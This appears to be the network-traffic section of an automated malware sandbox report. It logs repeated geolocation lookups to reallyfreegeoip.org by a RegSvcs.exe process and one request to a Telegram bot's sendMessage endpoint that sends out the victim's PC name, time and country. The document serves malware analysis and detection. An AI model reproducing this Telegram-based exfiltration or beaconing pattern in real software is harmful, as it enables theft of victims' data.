                                                                                                                  2025-01-14 15:57:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.1049808104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:25 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:25 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185034
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WV26CKA4j5MS6fpowLVPsHyYxOazsShF34iYIFqEOsZcUlxrDm9lP8j13yqLUv3JNmJO4Vy1fC%2FC5GK6ZfZuI8ofHcqG%2Bio8cz50E1BtasqrSzgfc9QCeZZZ8Cj43NCGP0rU8ggE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed25aaa3672a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2057&rtt_var=800&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1343764&cwnd=212&unsent_bytes=0&cid=d1db2203f68f680d&ts=168&x=0"
                                                                                                                  2025-01-14 15:57:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.1049822104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:26 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:26 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185035
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRBiK7pdgv%2B08rRMC8Em1jGCKpPbUpf73UuuLKqL73F%2BGXZgmUud14FEbtduQkcs9Jn6uGbv9m9Lk01wrFrUaE0nBlnHodR7uy1gZHUNRkBg48sFGZf9oEgAw8cO6ctmJ%2Fkz7GJF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed262cccf72a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1991&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1422308&cwnd=212&unsent_bytes=0&cid=eeac3f9e73b4007c&ts=155&x=0"
                                                                                                                  2025-01-14 15:57:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.1049832104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:28 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:28 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185037
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FbiVhUL2f06mTDkltRqo%2FZTGIwZgm68NO4xEQDhlhzO2Z1HuEOmd7Uv33z0PJv9LHy3%2FfNWPHsgaLVSWkPtX2YoVN3oPL5eUhWXVE5vpM3nBHJEcnbaRdjzDgWokPJCMg%2BJqrJQ7"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed26babac4363-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1633&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=240&unsent_bytes=0&cid=63f9e49872021e53&ts=172&x=0"
                                                                                                                  2025-01-14 15:57:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.1049843104.21.96.14437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:30 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:30 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:30 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185039
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n17aearMGIX7H0abDeFH9e9eehAxg9CJxcZvM4DHxK1xjfB1c1qqpPpHCjxgvMOZuKbB%2BnQzhzB2A2Q%2FKLJvfDSiEtPI6smbasjw1%2FIHv56d2UfFk1Y2bAz%2B0nTQX4w2Ytos5dBc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed27a1e4cde9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1478&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1908496&cwnd=194&unsent_bytes=0&cid=5248ad1373fabc91&ts=178&x=0"
                                                                                                                  2025-01-14 15:57:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.1049853149.154.167.2204437804C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:31 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:32 UTC344INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:32 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-14 15:57:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.1049877104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:36 UTC863INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:36 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185045
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LsWm3qPninmlYgu1272%2BYdf1a6IXbZ7II1qCBu0gteruQcu%2FgS8kBNIguqdzrVx5k5xdpDNv%2FOc%2FdJn%2FwvJeeHO%2BBG1fUckmhphi9%2Fm4OHTWMYFRjygvKEqsHPDmnNpxKGxD6he6"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed29c195072a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1962&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1471774&cwnd=212&unsent_bytes=0&cid=171e287f383ecfcf&ts=215&x=0"
                                                                                                                  2025-01-14 15:57:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.1049886104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  2025-01-14 15:57:36 UTC861INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:36 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185045
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f5aiaDPC54JM%2FrYpGs4p87nXdPL4VmVpt%2Bsi6Fx%2FE2VXRj1M2xFnQhccRk7fZDQsQDYGDzzX5P%2BU1cnGzYcnwudFX6%2B8YnS7u77eFMzWoXYGK6AxYeS5lknsHuFSNNR%2FqiXZ8coE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2a1480b72a4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1952&rtt_var=757&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1420924&cwnd=212&unsent_bytes=0&cid=5b4cbec2f6e74522&ts=142&x=0"
                                                                                                                  2025-01-14 15:57:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.1049895104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:38 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:38 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185047
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kx3TAWW4gWn2CpmEUOHS3aw8g2liSGFwMkSoCX%2F1htqLS9EPXop3OBYeJdmo5V6yli7RM%2BctF4DK9G0mmzwJ7aegR4uENc4iNL0umGhVLGlsfAAgrYVhpB%2FCclO1vEeAu7tvgleN"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2a98952de9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1447&min_rtt=1433&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1885087&cwnd=194&unsent_bytes=0&cid=f2ce730d255ddf49&ts=154&x=0"
                                                                                                                  2025-01-14 15:57:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.1049905104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-14 15:57:39 UTC865INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 14 Jan 2025 15:57:39 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 2185048
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmG5ji%2BDWag4GBygKnqGIQ96Tdku%2Bd9VF6jcDAQsPKYgScW%2FrzzHJ%2BlLzlLvHujtCLgjC6nKGZVrF7xrWuVHZr8vfP7DIY6Z2DNGPPsVeZD%2BjF%2FSO0%2FD15Qmlx7ftZa7B2W%2FbCcb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 901ed2b22900de9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1485&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1736028&cwnd=194&unsent_bytes=0&cid=7354cae936482045&ts=156&x=0"
                                                                                                                  2025-01-14 15:57:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
